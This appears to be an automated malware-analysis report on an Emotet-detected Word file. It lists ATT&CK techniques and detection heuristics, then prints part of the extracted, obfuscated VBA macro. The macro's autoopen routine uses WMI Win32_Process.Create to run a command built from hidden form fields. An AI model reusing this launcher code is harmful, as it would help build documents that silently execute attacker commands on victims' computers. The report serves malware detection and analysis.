Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1137.001 Office Application Startup: VBA
The sample contains a VBA macro with an autoopen subroutine, which is a common execution vector for Emotet. The macro utilizes GetObject and CreateObject to launch the Win32_Process WMI class, indicating an attempt to execute arbitrary code. ClamAV detection further confirms the malicious nature, identifying it as Emotet.
Heuristics 8
- ClamAV: Doc.Downloader.Emotet-6964795-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6964795-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5074 bytes |

SHA-256: 26506e2ca4143d79f1115c20662d8870e3445acf825ada505799387c7fcca35a
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "u7488674"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "r2770191"
Attribute VB_Base = "0{298A0B4D-C405-44A3-A216-69B71817332A}{D3AC5CC8-E14F-4C4D-8BA7-8653A35FE708}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Q75_17"
Attribute VB_Name = "t806__10"
Attribute VB_Name = "B3754251"
Attribute VB_Name = "i76123"
Attribute VB_Name = "k4324924"
Attribute VB_Base = "0{6B6C1F99-9163-46E1-83D7-D013DB63FC2D}{A5F1C39E-103E-4F35-BC8B-9494522B71A3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "J80_503"
Function l01539(t94757)
While m3474080 And Q7393_37
'R0_665n91616F978336v118985
Wend
While a9_7713 And K70079
'P24_3__2b_03835V129519b58155
Wend
Set l01539 = CVar(t94757)
While L80329 And L710777
'f27_2_23i2040240R408164m344886
Wend
While O72170 And h31542
'J_61030h08036_k70_90t59___4_
Wend
While a10516 And M80_2__
'k55257N156_324W__656Q1046_30
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While E__17488 And z2443692
'M787890W647419T4116483z__18_96
Wend
While O84_132 And v020692
'P9250916C605746R479237K283182
Wend
While b863410 And K7058879
'b98658F62963_8d2_71035K_5536_0
Wend
Call v_59872
While C70005 And D5912027
'o_915_w677_47s1531258L_59081
Wend
While f6500_ And b709458
'R10127a335_1V239008i711800_
Wend
While w5059010 And w9432729
'm249253_A53876_7z04089b1588820
Wend
End Sub
Attribute VB_Name = "N2509959"
Function v_59872()
On Error Resume Next
While H519_3 And X34422_
'c7555469m64014B73242m3_00271
Wend
While Z_8727 And Y565_022
'A54464r416228w11395Q66148
Wend
E3_127 = r2770191.i67_851.PasswordChar + k4324924.h458784 + r2770191.i67_851.PasswordChar + k4324924.l68683 + r2770191.i67_851.ControlTipText + r2770191.i67_851.PasswordChar + k4324924.q87773_ + r2770191.i67_851.ControlSource + r2770191.i67_851.ControlTipText + k4324924.m808457 + r2770191.i67_851 + k4324924.N4763858 + r2770191.i67_851.PasswordChar
While m4730184 And N003066
'P84230q092682A64267V187613
Wend
While z574358 And q82550
'a100_63v849_140O8118271f1037970
Wend
Set G_47_76 = l01539(GetObject("winmgmts:W" + "in32_Process"))
While a668672 And c905094
'r9321_P359500l59179O24686
Wend
While A0948871 And n98419
'z0312487V74697U57330i6502028
Wend
G_47_76.Create w968125 + E3_127 + v4129_, I974658, r520692_, i17575
While H91229 And v35958
'X72660P97929__Y5_105j394_865
Wend
While X579__ And q65433
'M0_85227p7_235X6_5542B946364
Wend
While P77627 And z3_7110
'G39491_6N894_9B33173_b3_82807
Wend
End Function
Attribute VB_Name = "k04312_"
Public Function r520692_()
While L013188 And C73__51
'E6382215l51683i889_433P7826762
Wend
While J184521 And X811710
'z07040_w6039766r0_4878Y86793_2
Wend
While C30584 And B1__01
'Y464279a097006V4726145D82142
Wend
Set r520692_ = l01539(GetObject("winmgmts:W" + "in32_ProcessStartup"))
While N_192975 And c7857051
'a0630155H37561D7_1927i09_2_
Wend
While F13687 And F9100321
'B5_592V29194q99919_S9945_
Wend
H865082_ = vbError - vbError
While M137902 And f8720006
'X12207u172525U20574U_7_8508
Wend
While W050805 And J862
... (truncated)